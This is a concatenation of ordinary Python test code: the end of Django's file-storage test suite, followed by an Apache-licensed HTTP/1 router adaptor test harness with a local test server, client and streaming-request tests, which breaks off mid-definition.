obj1.normal.save("django_test.txt", ContentFile("content"))
self.assertEqual(obj1.normal.name, "tests/django_test.txt")
self.assertEqual(obj1.normal.size, 7)
self.assertEqual(obj1.normal.read(), b"content")
obj1.normal.close()
# File objects can be assigned to FileField attributes, but shouldn't
# get committed until the model it's attached to is saved.
obj1.normal = SimpleUploadedFile("assignment.txt", b"content")
dirs, files = temp_storage.listdir("tests")
self.assertEqual(dirs, [])
self.assertNotIn("assignment.txt", files)
obj1.save()
dirs, files = temp_storage.listdir("tests")
self.assertEqual(sorted(files), ["assignment.txt", "django_test.txt"])
# Save another file with the same name.
obj2 = Storage()
obj2.normal.save("django_test.txt", ContentFile("more content"))
obj2_name = obj2.normal.name
self.assertRegex(obj2_name, "tests/django_test_%s.txt" % FILE_SUFFIX_REGEX)
self.assertEqual(obj2.normal.size, 12)
obj2.normal.close()
# Deleting an object does not delete the file it uses.
obj2.delete()
obj2.normal.save("django_test.txt", ContentFile("more content"))
self.assertNotEqual(obj2_name, obj2.normal.name)
self.assertRegex(obj2.normal.name, "tests/django_test_%s.txt" % FILE_SUFFIX_REGEX)
obj2.normal.close()
def test_filefield_read(self):
# Files can be read in a little at a time, if necessary.
obj = Storage.objects.create(
normal=SimpleUploadedFile("assignment.txt", b"content"))
obj.normal.open()
self.assertEqual(obj.normal.read(3), b"con")
self.assertEqual(obj.normal.read(), b"tent")
self.assertEqual(list(obj.normal.chunks(chunk_size=2)), [b"co", b"nt", b"en", b"t"])
obj.normal.close()
def test_filefield_write(self):
# Files can be written to.
obj = Storage.objects.create(normal=SimpleUploadedFile('rewritten.txt', b'content'))
with obj.normal as normal:
normal.open('wb')
normal.write(b'updated')
obj.refresh_from_db()
self.assertEqual(obj.normal.read(), b'updated')
obj.normal.close()
def test_filefield_reopen(self):
obj = Storage.objects.create(normal=SimpleUploadedFile('reopen.txt', b'content'))
with obj.normal as normal:
normal.open()
obj.normal.open()
obj.normal.file.seek(0)
obj.normal.close()
def test_duplicate_filename(self):
# Multiple files with the same name get _(7 random chars) appended to them.
objs = [Storage() for i in range(2)]
for o in objs:
o.normal.save("multiple_files.txt", ContentFile("Same Content"))
try:
names = [o.normal.name for o in objs]
self.assertEqual(names[0], "tests/multiple_files.txt")
self.assertRegex(names[1], "tests/multiple_files_%s.txt" % FILE_SUFFIX_REGEX)
finally:
for o in objs:
o.delete()
def test_file_truncation(self):
# Given the max_length is limited, when multiple files get uploaded
# under the same name, then the filename get truncated in order to fit
# in _(7 random chars). When most of the max_length is taken by
# dirname + extension and there are not enough characters in the
# filename to truncate, an exception should be raised.
objs = [Storage() for i in range(2)]
filename = 'filename.ext'
for o in objs:
o.limited_length.save(filename, ContentFile('Same Content'))
try:
# Testing truncation.
names = [o.limited_length.name for o in objs]
self.assertEqual(names[0], 'tests/%s' % filename)
self.assertRegex(names[1], 'tests/fi_%s.ext' % FILE_SUFFIX_REGEX)
# Testing exception is raised when filename is too short to truncate.
filename = 'short.longext'
objs[0].limited_length.save(filename, ContentFile('Same Content'))
with self.assertRaisesMessage(SuspiciousFileOperation, 'Storage can not find an available filename'):
objs[1].limited_length.save(*(filename, ContentFile('Same Content')))
finally:
for o in objs:
o.delete()
@unittest.skipIf(
sys.platform == 'win32',
"Windows supports at most 260 characters in a path.",
)
def test_extended_length_storage(self):
# Testing FileField with max_length > 255. Most systems have filename
# length limitation of 255. Path takes extra chars.
filename = (self._storage_max_filename_length(temp_storage) - 4) * 'a' # 4 chars for extension.
obj = Storage()
obj.extended_length.save('%s.txt' % filename, ContentFile('Same Content'))
self.assertEqual(obj.extended_length.name, 'tests/%s.txt' % filename)
self.assertEqual(obj.extended_length.read(), b'Same Content')
obj.extended_length.close()
def test_filefield_default(self):
# Default values allow an object to access a single file.
temp_storage.save('tests/default.txt', ContentFile('default content'))
obj = Storage.objects.create()
self.assertEqual(obj.default.name, "tests/default.txt")
self.assertEqual(obj.default.read(), b"default content")
obj.default.close()
# But it shouldn't be deleted, even if there are no more objects using
# it.
obj.delete()
obj = Storage()
self.assertEqual(obj.default.read(), b"default content")
obj.default.close()
def test_empty_upload_to(self):
# upload_to can be empty, meaning it does not use subdirectory.
obj = Storage()
obj.empty.save('django_test.txt', ContentFile('more content'))
self.assertEqual(obj.empty.name, "django_test.txt")
self.assertEqual(obj.empty.read(), b"more content")
obj.empty.close()
def test_pathlib_upload_to(self):
obj = Storage()
obj.pathlib_callable.save('some_file1.txt', ContentFile('some content'))
self.assertEqual(obj.pathlib_callable.name, 'bar/some_file1.txt')
obj.pathlib_direct.save('some_file2.txt', ContentFile('some content'))
self.assertEqual(obj.pathlib_direct.name, 'bar/some_file2.txt')
obj.random.close()
def test_random_upload_to(self):
# Verify the fix for #5655, making sure the directory is only
# determined once.
obj = Storage()
obj.random.save("random_file", ContentFile("random content"))
self.assertTrue(obj.random.name.endswith("/random_file"))
obj.random.close()
def test_custom_valid_name_callable_upload_to(self):
"""
Storage.get_valid_name() should be called when upload_to is a callable.
"""
obj = Storage()
obj.custom_valid_name.save("random_file", ContentFile("random content"))
# CustomValidNameStorage.get_valid_name() appends '_valid' to the name
self.assertTrue(obj.custom_valid_name.name.endswith("/random_file_valid"))
obj.custom_valid_name.close()
def test_filefield_pickling(self):
# Push an object into the cache to make sure it pickles properly
obj = Storage()
obj.normal.save("django_test.txt", ContentFile("more content"))
obj.normal.close()
cache.set("obj", obj)
self.assertEqual(cache.get("obj").normal.name, "tests/django_test.txt")
def test_file_object(self):
# Create sample file
temp_storage.save('tests/example.txt', ContentFile('some content'))
# Load it as Python file object
with open(temp_storage.path('tests/example.txt')) as file_obj:
# Save it using storage and read its content
temp_storage.save('tests/file_obj', file_obj)
self.assertTrue(temp_storage.exists('tests/file_obj'))
with temp_storage.open('tests/file_obj') as f:
self.assertEqual(f.read(), b'some content')
def test_stringio(self):
# Test passing StringIO instance as content argument to save
output = StringIO()
output.write('content')
output.seek(0)
# Save it and read written file
temp_storage.save('tests/stringio', output)
self.assertTrue(temp_storage.exists('tests/stringio'))
with temp_storage.open('tests/stringio') as f:
self.assertEqual(f.read(), b'content')
class FieldCallableFileStorageTests(SimpleTestCase):
def setUp(self):
self.temp_storage_location = tempfile.mkdtemp(suffix='filefield_callable_storage')
def tearDown(self):
shutil.rmtree(self.temp_storage_location)
def test_callable_base_class_error_raises(self):
class NotStorage:
pass
msg = 'FileField.storage must be a subclass/instance of django.core.files.storage.Storage'
for invalid_type in (NotStorage, str, list, set, tuple):
with self.subTest(invalid_type=invalid_type):
with self.assertRaisesMessage(TypeError, msg):
FileField(storage=invalid_type)
def test_file_field_storage_none_uses_default_storage(self):
self.assertEqual(FileField().storage, default_storage)
def test_callable_function_storage_file_field(self):
storage = FileSystemStorage(location=self.temp_storage_location)
def get_storage():
return storage
obj = FileField(storage=get_storage)
self.assertEqual(obj.storage, storage)
self.assertEqual(obj.storage.location, storage.location)
def test_callable_class_storage_file_field(self):
class GetStorage(FileSystemStorage):
pass
obj = FileField(storage=GetStorage)
self.assertIsInstance(obj.storage, BaseStorage)
def test_callable_storage_file_field_in_model(self):
obj = Storage()
self.assertEqual(obj.storage_callable.storage, temp_storage)
self.assertEqual(obj.storage_callable.storage.location, temp_storage_location)
self.assertIsInstance(obj.storage_callable_class.storage, BaseStorage)
def test_deconstruction(self):
"""
Deconstructing gives the original callable, not the evaluated value.
"""
obj = Storage()
*_, kwargs = obj._meta.get_field('storage_callable').deconstruct()
storage = kwargs['storage']
self.assertIs(storage, callable_storage)
# Tests for a race condition on file saving (#4948).
# This is written in such a way that it'll always pass on platforms
# without threading.
class SlowFile(ContentFile):
def chunks(self):
time.sleep(1)
return super().chunks()
class FileSaveRaceConditionTest(SimpleTestCase):
def setUp(self):
self.storage_dir = tempfile.mkdtemp()
self.storage = FileSystemStorage(self.storage_dir)
self.thread = threading.Thread(target=self.save_file, args=['conflict'])
def tearDown(self):
shutil.rmtree(self.storage_dir)
def save_file(self, name):
name = self.storage.save(name, SlowFile(b"Data"))
def test_race_condition(self):
self.thread.start()
self.save_file('conflict')
self.thread.join()
files = sorted(os.listdir(self.storage_dir))
self.assertEqual(files[0], 'conflict')
self.assertRegex(files[1], 'conflict_%s' % FILE_SUFFIX_REGEX)
@unittest.skipIf(sys.platform == 'win32', "Windows only partially supports umasks and chmod.")
class FileStoragePermissions(unittest.TestCase):
def setUp(self):
self.umask = 0o027
self.old_umask = os.umask(self.umask)
self.storage_dir = tempfile.mkdtemp()
def tearDown(self):
shutil.rmtree(self.storage_dir)
os.umask(self.old_umask)
@override_settings(FILE_UPLOAD_PERMISSIONS=0o654)
def test_file_upload_permissions(self):
self.storage = FileSystemStorage(self.storage_dir)
name = self.storage.save("the_file", ContentFile("data"))
actual_mode = os.stat(self.storage.path(name))[0] & 0o777
self.assertEqual(actual_mode, 0o654)
@override_settings(FILE_UPLOAD_PERMISSIONS=None)
def test_file_upload_default_permissions(self):
self.storage = FileSystemStorage(self.storage_dir)
fname = self.storage.save("some_file", ContentFile("data"))
mode = os.stat(self.storage.path(fname))[0] & 0o777
self.assertEqual(mode, 0o666 & ~self.umask)
@override_settings(FILE_UPLOAD_DIRECTORY_PERMISSIONS=0o765)
def test_file_upload_directory_permissions(self):
self.storage = FileSystemStorage(self.storage_dir)
name = self.storage.save('the_directory/subdir/the_file', ContentFile('data'))
file_path = Path(self.storage.path(name))
self.assertEqual(file_path.parent.stat().st_mode & 0o777, 0o765)
self.assertEqual(file_path.parent.parent.stat().st_mode & 0o777, 0o765)
@override_settings(FILE_UPLOAD_DIRECTORY_PERMISSIONS=None)
def test_file_upload_directory_default_permissions(self):
self.storage = FileSystemStorage(self.storage_dir)
name = self.storage.save('the_directory/subdir/the_file', ContentFile('data'))
file_path = Path(self.storage.path(name))
expected_mode = 0o777 & ~self.umask
self.assertEqual(file_path.parent.stat().st_mode & 0o777, expected_mode)
self.assertEqual(file_path.parent.parent.stat().st_mode & 0o777, expected_mode)
class FileStoragePathParsing(SimpleTestCase):
def setUp(self):
self.storage_dir = tempfile.mkdtemp()
self.storage = FileSystemStorage(self.storage_dir)
def tearDown(self):
shutil.rmtree(self.storage_dir)
def test_directory_with_dot(self):
"""Regression test for #9610.
If the directory name contains a dot and the file name doesn't, make
sure we still mangle the file name instead of the directory name.
"""
self.storage.save('dotted.path/test', ContentFile("1"))
self.storage.save('dotted.path/test', ContentFile("2"))
files = sorted(os.listdir(os.path.join(self.storage_dir, 'dotted.path')))
self.assertFalse(os.path.exists(os.path.join(self.storage_dir, 'dotted_.path')))
self.assertEqual(files[0], 'test')
self.assertRegex(files[1], 'test_%s' % FILE_SUFFIX_REGEX)
def test_first_character_dot(self):
"""
File names with a dot as their first character don't have an extension,
and the underscore should get added to the end.
"""
self.storage.save('dotted.path/.test', ContentFile("1"))
self.storage.save('dotted.path/.test', ContentFile("2"))
files = sorted(os.listdir(os.path.join(self.storage_dir, 'dotted.path')))
self.assertFalse(os.path.exists(os.path.join(self.storage_dir, 'dotted_.path')))
self.assertEqual(files[0], '.test')
self.assertRegex(files[1], '.test_%s' % FILE_SUFFIX_REGEX)
class ContentFileStorageTestCase(unittest.TestCase):
def setUp(self):
self.storage_dir = tempfile.mkdtemp()
self.storage = FileSystemStorage(self.storage_dir)
def tearDown(self):
shutil.rmtree(self.storage_dir)
def test_content_saving(self):
"""
ContentFile can be saved correctly with the filesystem storage,
if it was initialized with either bytes or unicode content.
"""
self.storage.save('bytes.txt', ContentFile(b"content"))
self.storage.save('unicode.txt', ContentFile("español"))
@override_settings(ROOT_URLCONF='file_storage.urls')
class FileLikeObjectTestCase(LiveServerTestCase):
"""
Test file-like objects (#15644).
"""
available_apps = []
def setUp(self):
self.temp_dir = tempfile.mkdtemp()
self.storage = FileSystemStorage(location=self.temp_dir)
def tearDown(self):
shutil.rmtree(self.temp_dir)
def test_urllib_request_urlopen(self):
"""
Test the File storage API with a file-like object coming from
urllib.request.urlopen().
"""
file_like_object = urlopen(self.live_server_url + '/')
f = File(file_like_object)
stored_filename = self.storage.save("remote_file.html", f)
remote_file = urlopen(self.live_server_url + '/')
with self.storage.open(stored_filename) as stored_file:
self.assertEqual(stored_file.read(), remote_file.read())
|
http1_tests.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import socket
import uuid
from threading import Thread
from time import sleep
try:
from http.server import HTTPServer, BaseHTTPRequestHandler
from http.client import HTTPConnection
from http.client import HTTPException
except ImportError:
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
from httplib import HTTPConnection, HTTPException
from system_test import TestCase, TIMEOUT, Logger, Qdrouterd
class RequestHandler(BaseHTTPRequestHandler):
"""
Dispatches requests received by the HTTPServer based on the method
"""
protocol_version = 'HTTP/1.1'
def _execute_request(self, tests):
for req, resp, val in tests:
if req.target == self.path:
xhdrs = None
if "test-echo" in self.headers:
xhdrs = {"test-echo":
self.headers["test-echo"]}
self._consume_body()
if not isinstance(resp, list):
resp = [resp]
for r in resp:
r.send_response(self, extra_headers=xhdrs)
self.server.request_count += 1
return
self.send_error(404, "Not Found")
def do_GET(self):
self._execute_request(self.server.system_tests["GET"])
def do_HEAD(self):
self._execute_request(self.server.system_tests["HEAD"])
def do_POST(self):
if self.path == "/SHUTDOWN":
self.send_response(200, "OK")
self.send_header("Content-Length", "13")
self.end_headers()
self.wfile.write(b'Server Closed')
self.wfile.flush()
self.close_connection = True
self.server.server_killed = True
return
self._execute_request(self.server.system_tests["POST"])
def do_PUT(self):
self._execute_request(self.server.system_tests["PUT"])
# these overrides just quiet the test output
# comment them out to help debug:
def log_request(self, code=None, size=None):
pass
def log_message(self, format=None, *args):
pass
def _consume_body(self):
"""
Read the entire body off the rfile. This must be done to allow
multiple requests on the same socket
"""
if self.command == 'HEAD':
return b''
for key, value in self.headers.items():
if key.lower() == 'content-length':
return self.rfile.read(int(value))
if key.lower() == 'transfer-encoding' \
and 'chunked' in value.lower():
body = b''
while True:
header = self.rfile.readline().strip().split(b';')[0]
hlen = int(header, base=16)
if hlen > 0:
data = self.rfile.read(hlen + 2) # 2 = \r\n
body += data[:-2]
else:
self.rfile.readline() # discard last \r\n
break
return body
return self.rfile.read()
class RequestHandler10(RequestHandler):
"""
RequestHandler that forces the server to use HTTP version 1.0 semantics
"""
protocol_version = 'HTTP/1.0'
class MyHTTPServer(HTTPServer):
"""
Adds a switch to the HTTPServer to allow it to exit gracefully
"""
def __init__(self, addr, handler_cls, testcases):
self.system_tests = testcases
self.request_count = 0
HTTPServer.__init__(self, addr, handler_cls)
def server_close(self):
try:
# force immediate close of listening socket
self.socket.shutdown(socket.SHUT_RDWR)
except Exception:
pass
HTTPServer.server_close(self)
class ThreadedTestClient(object):
"""
An HTTP client running in a separate thread
"""
def __init__(self, tests, port, repeat=1):
self._id = uuid.uuid4().hex
self._conn_addr = ("127.0.0.1:%s" % port)
self._tests = tests
self._repeat = repeat
self._logger = Logger(title="TestClient: %s" % self._id,
print_to_console=False)
self._thread = Thread(target=self._run)
self._thread.daemon = True
self.error = None
self.count = 0
self._thread.start()
def _run(self):
self._logger.log("TestClient connecting on %s" % self._conn_addr)
client = HTTPConnection(self._conn_addr, timeout=TIMEOUT)
self._logger.log("TestClient connected")
for loop in range(self._repeat):
self._logger.log("TestClient start request %d" % loop)
for op, tests in self._tests.items():
for req, _, val in tests:
self._logger.log("TestClient sending %s %s request" % (op, req.target))
req.send_request(client,
{"test-echo": "%s-%s-%s-%s" % (self._id,
loop,
op,
req.target)})
self._logger.log("TestClient getting %s response" % op)
try:
rsp = client.getresponse()
except HTTPException as exc:
self._logger.log("TestClient response failed: %s" % exc)
self.error = str(exc)
return
self._logger.log("TestClient response %s received" % op)
if val:
try:
body = val.check_response(rsp)
except Exception as exc:
self._logger.log("TestClient response invalid: %s"
% str(exc))
self.error = "client failed: %s" % str(exc)
return
if req.method == "BODY" and body != b'':
self._logger.log("TestClient response invalid: %s"
% "body present!")
self.error = "error: body present!"
return
self.count += 1
self._logger.log("TestClient request %s %s completed!" %
(op, req.target))
client.close()
self._logger.log("TestClient to %s closed" % self._conn_addr)
def wait(self, timeout=TIMEOUT):
self._thread.join(timeout=TIMEOUT)
self._logger.log("TestClient %s shut down" % self._conn_addr)
sleep(0.5) # fudge factor allow socket close to complete
def dump_log(self):
self._logger.dump()
class TestServer(object):
"""
A HTTPServer running in a separate thread
"""
def __init__(self, server_port, client_port, tests, handler_cls=None):
self._logger = Logger(title="TestServer", print_to_console=False)
self._client_port = client_port
self._server_addr = ("", server_port)
self._server = MyHTTPServer(self._server_addr,
handler_cls or RequestHandler,
tests)
self._server.allow_reuse_address = True
self._thread = Thread(target=self._run)
self._thread.daemon = True
self._thread.start()
def _run(self):
self._logger.log("TestServer listening on %s:%s" % self._server_addr)
try:
self._server.server_killed = False
while not self._server.server_killed:
self._server.handle_request()
except Exception as exc:
self._logger.log("TestServer %s crash: %s" %
(self._server_addr, exc))
raise
self._logger.log("TestServer %s:%s closed" % self._server_addr)
def wait(self, timeout=TIMEOUT):
self._logger.log("TestServer %s:%s shutting down" % self._server_addr)
self.request_count = 0
if self._thread.is_alive():
client = HTTPConnection("127.0.0.1:%s" % self._client_port,
timeout=TIMEOUT)
client.putrequest("POST", "/SHUTDOWN")
client.putheader("Content-Length", "0")
client.endheaders()
# 13 == len('Server Closed')
client.getresponse().read(13)
client.close()
self._thread.join(timeout=TIMEOUT)
if self._server:
self._server.server_close()
self.request_count = self._server.request_count
del self._server
sleep(0.5) # fudge factor allow socket close to complete
def http1_ping(sport, cport):
"""
Test the HTTP path by doing a simple GET request
"""
TEST = {
"GET": [
(RequestMsg("GET", "/GET/ping",
headers={"Content-Length": 0}),
ResponseMsg(200, reason="OK",
headers={"Content-Length": 4,
"Content-Type": "text/plain;charset=utf-8"},
body=b'pong'),
ResponseValidator(expect_body=b'pong'))
]
}
server = TestServer(server_port=sport,
client_port=cport,
tests=TEST)
client = ThreadedTestClient(tests=TEST, port=cport)
client.wait()
server.wait()
return (client.count, client.error)
class ResponseMsg(object):
"""
A 'hardcoded' HTTP response message. This class writes its response
message when called by the HTTPServer via the BaseHTTPRequestHandler
"""
def __init__(self, status, version=None, reason=None,
headers=None, body=None, error=False):
self.status = status
self.version = version or "HTTP/1.1"
self.reason = reason
self.headers = headers or {}
self.body = body
self.error = error
def send_response(self, handler, extra_headers=None):
extra_headers = extra_headers or {}
if self.error:
handler.send_error(self.status,
message=self.reason)
return
handler.send_response(self.status, self.reason)
for key, value in self.headers.items():
handler.send_header(key, value)
for key, value in extra_headers.items():
handler.send_header(key, value)
handler.end_headers()
if self.body:
handler.wfile.write(self.body)
handler.wfile.flush()
class RequestMsg(object):
"""
A 'hardcoded' HTTP request message. This class writes its request
message to the HTTPConnection.
"""
def __init__(self, method, target, headers=None, body=None):
self.method = method
self.target = target
self.headers = headers or {}
self.body = body
def send_request(self, conn, extra_headers=None):
extra_headers = extra_headers or {}
conn.putrequest(self.method, self.target)
for key, value in self.headers.items():
conn.putheader(key, value)
for key, value in extra_headers.items():
conn.putheader(key, value)
conn.endheaders()
if self.body:
conn.send(self.body)
class ResponseValidator(object):
"""
Validate a response as received by the HTTP client
"""
def __init__(self, status=200, expect_headers=None, expect_body=None):
if expect_headers is None:
expect_headers = {}
self.status = status
self.expect_headers = expect_headers
self.expect_body = expect_body
def check_response(self, rsp):
if self.status and rsp.status != self.status:
raise Exception("Bad response code, expected %s got %s"
% (self.status, rsp.status))
for key, value in self.expect_headers.items():
if rsp.getheader(key) != value:
raise Exception("Missing/bad header (%s), expected %s got %s"
% (key, value, rsp.getheader(key)))
body = rsp.read()
if (self.expect_body and self.expect_body != body):
raise Exception("Bad response body expected %s got %s"
% (self.expect_body, body))
return body
class CommonHttp1Edge2EdgeTest(object):
def test_01_concurrent_requests(self):
"""
Test multiple concurrent clients sending streaming messages
"""
REQ_CT = 3 # 3 requests per TEST_*
TESTS_11 = {
"PUT": [
(RequestMsg("PUT", "/PUT/test_01_concurrent_requests_11",
headers={
"Transfer-encoding": "chunked",
"Content-Type": "text/plain;charset=utf-8"
},
# ~384K to trigger Q2
body=b'20000\r\n' + b'1' * 0x20000 + b'\r\n'
+ b'20000\r\n' + b'2' * 0x20000 + b'\r\n'
+ b'20000\r\n' + b'3' * 0x20000 + b'\r\n'
+ b'13\r\nEND OF TRANSMISSION\r\n'
+ b'0\r\n\r\n'),
ResponseMsg(201, reason="Created",
headers={"Test-Header": "/PUT/test_01_concurrent_requests_11",
"Content-Length": "0"}),
ResponseValidator(status=201)
)],
"GET": [
(RequestMsg("GET", "/GET/test_01_concurrent_requests_11_small",
headers={"Content-Length": "000"}),
ResponseMsg(200, reason="OK",
headers={
"Content-Length": "19",
"Content-Type": "text/plain;charset=utf-8",
"Test-Header": "/GET/test_01_concurrent_requests_11_small"
},
body=b'END OF TRANSMISSION'),
ResponseValidator(status=200)),
(RequestMsg("GET", "/GET/test_01_concurrent_requests_11",
headers={"Content-Length": "000"}),
ResponseMsg(200, reason="OK",
headers={
"transfer-Encoding": "chunked",
"Content-Type": "text/plain;charset=utf-8",
"Test-Header": "/GET/test_01_concurrent_requests_11"
},
# ~384K to trigger Q2
body=b'20000\r\n' + b'1' * 0x20000 + b'\r\n'
+ b'20000\r\n' + b'2' * 0x20000 + b'\r\n'
+ b'20000\r\n' + b'3' * 0x20000 + b'\r\n'
+ b'13\r\nEND OF TRANSMISSION\r\n'
+ b'0\r\n\r\n'),
ResponseValidator(status=200)
)],
}
TESTS_10 = {
"POST": [
(RequestMsg("POST", "/POST/test_01_concurrent_requests_10",
headers={"Content-Type": "text/plain;charset=utf-8",
"Content-Length": "393216"},
body=b'P' * 393197
+ b'END OF TRANSMISSION'),
ResponseMsg(201, reason="Created",
headers={"Test-Header": "/POST/test_01_concurrent_requests_10",
"Content-Length": "0"}),
ResponseValidator(status=201)
)],
"GET": [
(RequestMsg("GET", "/GET/test_01_concurrent_requests_10_small",
headers={"Content-Length": "000"}),
ResponseMsg(200, reason="OK",
# no content-length, server must close conn when done
headers={"Test-Header": "/GET/test_01_concurrent_requests_10_small",
"Content-Type": "text/plain;charset=utf-8"},
body=b'END OF TRANSMISSION'),
ResponseValidator(status=200)),
(RequestMsg("GET", "/GET/test_01_concurrent_requests_10",
headers={"Content-Length": "000"}),
ResponseMsg(200, reason="OK",
headers={"Test-Header": "/GET/test_01_concurrent_requests_10",
"Content-Length": "393215",
"Content-Type": "text/plain;charset=utf-8"},
body=b'G' * 393196
+ b'END OF TRANSMISSION'),
ResponseValidator(status=200)
)],
}
server11 = TestServer(server_port=self.http_server11_port,
client_port=self.http_listener11_port,
tests=TESTS_11)
server10 = TestServer(server_port=self.http_server10_port,
client_port=self.http_listener10_port,
tests=TESTS_10,
handler_cls=RequestHandler10)
self.EA2.wait_connectors()
repeat_ct = 10
client_ct = 4 # per version
clients = []
for _ in range(client_ct):
clients.append(ThreadedTestClient(TESTS_11,
self.http_listener11_port,
repeat=repeat_ct))
clients.append(ThreadedTestClient(TESTS_10,
self.http_listener10_port,
repeat=repeat_ct))
for client in clients:
client.wait()
try:
self.assertIsNone(client.error)
self.assertEqual(repeat_ct * REQ_CT, client.count)
except Exception:
client.dump_log()
raise
server11.wait()
self.assertEqual(client_ct * repeat_ct * REQ_CT,
server11.request_count)
server10.wait()
self.assertEqual(client_ct * repeat_ct * REQ_CT,
server10.request_count)
def test_02_credit_replenish(self):
"""
Verify credit is replenished by sending > the default credit window
requests across the routers. The default credit window is 250
"""
TESTS = {
"GET": [
(RequestMsg("GET", "/GET/test_02_credit_replenish",
headers={"Content-Length": "000"}),
ResponseMsg(200, reason="OK",
headers={"Content-Length": "24",
"Content-Type": "text/plain;charset=utf-8"},
body=b'test_02_credit_replenish'),
ResponseValidator(status=200),
),
]
}
server = TestServer(server_port=self.http_server11_port,
client_port=self.http_listener11_port,
tests=TESTS)
self.EA2.wait_connectors()
client = ThreadedTestClient(TESTS,
self.http_listener11_port,
repeat=300)
client.wait()
self.assertIsNone(client.error)
self.assertEqual(300, client.count)
server.wait()
def test_03_server_reconnect(self):
"""
Verify server reconnect logic.
"""
TESTS = {
"GET": [
(RequestMsg("GET", "/GET/test_03_server_reconnect",
headers={"Content-Length": "000"}),
ResponseMsg(200, reason="OK",
headers={"Content-Length": "24",
"Content-Type": "text/plain;charset=utf-8"},
body=b'test_03_server_reconnect'),
ResponseValidator(status=200),
),
]
}
# bring up the server and send some requests. This will cause the
# router to grant credit for clients
server = TestServer(server_port=self.http_server11_port,
client_port=self.http_listener11_port,
tests=TESTS)
self.EA2.wait_connectors()
client = ThreadedTestClient(TESTS,
self.http_listener11_port,
repeat=2)
client.wait()
self.assertIsNone(client.error)
self.assertEqual(2, client.count)
# simulate server loss. Fire up a client which should be granted
# credit since the adaptor does not immediately teardown the server
# links. This will cause the adaptor to run qdr_connection_process
# without a raw connection available to wake the I/O thread..
server.wait()
client = ThreadedTestClient(TESTS,
self.http_listener11_port,
repeat=2)
# the adaptor will detach the links to the server if the connection
# cannot be reestablished after 2.5 seconds. Restart the server before
# that occurrs to prevent client messages from being released with 503
# status.
server = TestServer(server_port=self.http_server11_port,
client_port=self.http_listener11_port,
tests=TESTS)
client.wait()
self.assertIsNone(client.error)
self.assertEqual(2, client.count)
server.wait()
def test_04_server_pining_for_the_fjords(self):
"""
Test permanent loss of server
"""
TESTS = {
"GET": [
(RequestMsg("GET", "/GET/test_04_fjord_pining",
headers={"Content-Length": "000"}),
ResponseMsg(200, reason="OK",
headers={"Content-Length": "20",
"Content-Type": "text/plain;charset=utf-8"},
body=b'test_04_fjord_pining'),
ResponseValidator(status=200),
),
]
}
# bring up the server and send some requests. This will cause the
# router to grant credit for clients
server = TestServer(server_port=self.http_server11_port,
client_port=self.http_listener11_port,
tests=TESTS)
self.EA2.wait_connectors()
client = ThreadedTestClient(TESTS, self.http_listener11_port)
client.wait()
self.assertIsNone(client.error)
self.assertEqual(1, client.count)
TESTS_FAIL = {
"GET": [
(RequestMsg("GET", "/GET/test_04_fjord_pining",
headers={"Content-Length": "000"}),
ResponseMsg(200, reason="OK",
headers={"Content-Length": "20",
"Content-Type": "text/plain;charset=utf-8"},
body=b'test_04_fjord_pining'),
ResponseValidator(status=503),
),
]
}
# Kill the server then issue client requests. These requests will be
# held on the server's outgoing links until they expire (2.5 seconds).
# At that point the client will receive a 503 response.
server.wait()
client = ThreadedTestClient(TESTS_FAIL, self.http_listener11_port)
client.wait()
self.assertIsNone(client.error)
self.assertEqual(1, client.count)
# ensure links recover once the server re-appears
server = TestServer(server_port=self.http_server11_port,
client_port=self.http_listener11_port,
tests=TESTS)
self.EA2.wait_connectors()
client = ThreadedTestClient(TESTS, self.http_listener11_port)
client.wait()
self.assertIsNone(client.error)
self.assertEqual(1, client.count)
server.wait()
def test_05_large_streaming_msg(self):
"""
Verify large streaming message transfer
"""
TESTS_11 = {
"PUT": [
(RequestMsg("PUT", "/PUT/streaming_test_11",
headers={
"Transfer-encoding": "chunked",
"Content-Type": "text/plain;charset=utf-8"
},
# 4 chunks each ~= 600K
body=b'927C1\r\n' + b'0' * 0x927C0 + b'X\r\n'
+ b'927C0\r\n' + b'1' * 0x927C0 + b'\r\n'
+ b'927C1\r\n' + b'2' * 0x927C0 + b'X\r\n'
+ b'927C0\r\n' + b'3' * 0x927C0 + b'\r\n'
+ b'0\r\n\r\n'),
ResponseMsg(201, reason="Created",
headers={"Response-Header": "data",
"Content-Length": "0"}),
ResponseValidator(status=201))
],
"GET": [
(RequestMsg("GET", "/GET/streaming_test_11",
headers={"Content-Length": "000"}),
ResponseMsg(200, reason="OK",
headers={
"transfer-Encoding": "chunked",
"Content-Type": "text/plain;charset=utf-8"
},
# two 1.2MB chunk
body=b'124f80\r\n' + b'4' * 0x124F80 + b'\r\n'
+ b'124f80\r\n' + b'5' * 0x124F80 + b'\r\n'
+ b'0\r\n\r\n'),
ResponseValidator(status=200))
],
}
TESTS_10 = {
"POST": [
(RequestMsg("POST", "/POST/streaming_test_10",
headers={"Header-1": "H" * 2048,
"Content-Length": "2097155",
"Content-Type": "text/plain;charset=utf-8"},
body=b'P' * 2097155),
ResponseMsg(201, reason="Created",
headers={"Response-Header": "data",
"Content-Length": "0"}),
ResponseValidator(status=201))
],
"GET": [
(RequestMsg("GET", "/GET/streaming_test_10",
headers={"Content-Length": "000"}),
ResponseMsg(200, reason="OK",
headers={"Content-Length": "1999999",
"Content-Type": "text/plain;charset=utf-8"},
body=b'G' * 1999999),
ResponseValidator(status=200))
],
}
server11 = TestServer(server_port=self.http_server11_port,
client_port=self.http_listener11_port,
tests=TESTS_11)
server10 = TestServer(server_port=self.http_server10_port,
client_port=self.http_listener10_port,
tests=TESTS_10,
handler_cls=RequestHandler10)
self.EA2.wait_connectors()
client11 = ThreadedTestClient(TESTS_11,
self.http_listener11_port,
repeat=2)
client11.wait()
self.assertIsNone(client11.error)
self.assertEqual(4, client11.count)
client10 = ThreadedTestClient(TESTS_10,
self.http_listener10_port,
repeat=2)
client10.wait()
self.assertIsNone(client10.error)
self.assertEqual(4, client10.count)
server11.wait()
server10.wait()
class CommonHttp1OneRouterTest(object):
TESTS_11 = {
#
# GET
#
"GET": [
(RequestMsg("GET", "/GET/error",
headers={"Content-Length": 0}),
